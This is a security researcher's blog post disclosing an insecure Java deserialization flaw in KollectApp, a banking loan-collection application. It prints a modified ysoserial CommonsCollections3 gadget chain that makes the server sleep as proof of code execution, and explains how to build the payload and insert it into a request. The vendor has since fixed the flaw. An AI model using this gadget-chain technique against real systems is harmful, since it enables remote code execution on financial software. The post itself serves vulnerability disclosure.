Blog

Author: Ahmed Attalla (Security Researcher at Malcrove)

KollectApp is a desktop application used heavily in the banking sector; it’s used to manage loan collection given to customers by the bank.
While doing a penetration test on the application, I discovered critical insecure java deserialization that leads to remote code execution.
During testing, I noticed the presence of java serialized payload at one of the application’s requests.

Since I decompiled the application jar files, I know that the commons collection gadget exists. Therefore I generated ysoserial payload to make the application sleep and copied the payload to the body request; unfortunately, it didn’t work.

The reason for this is that ysoserial generates the payload using Runtime.getRuntime().exec("sleep(20000)")
This new process “Runtime” runs asynchronously in a new thread, hence it didn’t work.
For the sleep function to work, we need to use java.lang.Thread.sleep(20)
Which will force the sleep function to run in the same thread. Hence the application will sleep for 20 seconds.
Below is the proof of concept code used to modify the file CommonsCollection3.java file in ysoserial.

public BadAttributeValueExpException getObject(final String command) throws Exception {
                
        final Object[] execArgs = new Object[] {Long.parseLong(command)};        
        
        // inert chain for setup
        final Transformer transformerChain = new ChainedTransformer(
                new Transformer[]{ new ConstantTransformer(1) });
        // real chain for after setup

        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(java.lang.Thread.class),
                new InvokerTransformer("getMethod", new Class[] {
                    String.class, Class[].class }, new Object[] {
                    "sleep", new Class[]{long.class} }),
                new InvokerTransformer("invoke", new Class[] {
                    Object.class, Object[].class }, new Object[] {
                    new Class[] { long.class }, execArgs }),
                new ConstantTransformer(1) };

        final Map innerMap = new HashMap();
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);     
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
        
        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        Field valfield = val.getClass().getDeclaredField("val");
        valfield.setAccessible(true);
        valfield.set(val, entry);

        Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

        return val;
    }

Finally, compile the new file and run ysoserial again to generate java serialized payload using CommonsCollection3 gadget, and insert the generated payload in the request body.

This will cause the application to sleep for 20 seconds, as in the below screenshot.

The vulnerability was reported to the vendor, and they swiftly released the fix.